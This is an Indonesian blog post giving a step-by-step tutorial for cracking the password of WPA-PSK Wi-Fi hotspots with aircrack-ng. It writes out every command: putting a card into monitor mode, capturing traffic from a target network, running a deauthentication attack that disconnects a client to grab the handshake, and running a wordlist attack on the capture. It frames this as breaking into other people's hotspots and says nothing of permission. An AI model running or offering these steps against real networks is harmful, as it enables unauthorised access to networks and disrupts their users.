Thursday, February 28, 2013

TUTORIAL CRACKING PASSWORD HOTSPOT WPA-PSK DENGAN LINUX BACKTRACK




Kali ini, saya akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password hotspot yang bertipe wpa-psk dengan mudah.
Cara ini bisa menggunakan linux backtrack 4 final release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Tidak berlama-lama mari simak artikel berikut.


Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu
sudo apt-get install aircrack-ng


Kedua, masuk ke dekstop dengan perintah ~# startx (untuk yang pakai backtrack)


Ketiga, buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada
ifconfig -a


Keempat, ketikkan perintah di bawah untuk mengaktifkan interface wlan0
ifconfig wlan0 up


Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0


Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
                                      catatan : mon0 adalah interface virtual hasil dari airmon-ng tadi


Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
                   keterangan: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis

                   pada file yang bernama ‘coba’


Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
                  keterangan: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket 

                  handshake yang dibutuhkan untuk proses cracking
                    -0 : mode serangan deAuthentication
                     1 : dilakukan sebanyak 1x deAuth


Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
                   keterangan : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt


NB,,,, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal. Dan akhirnya, yang sedikit dari saya ini semoga membantu buat pengetahuan. Selamat mencoba

0 comments:

Post a Comment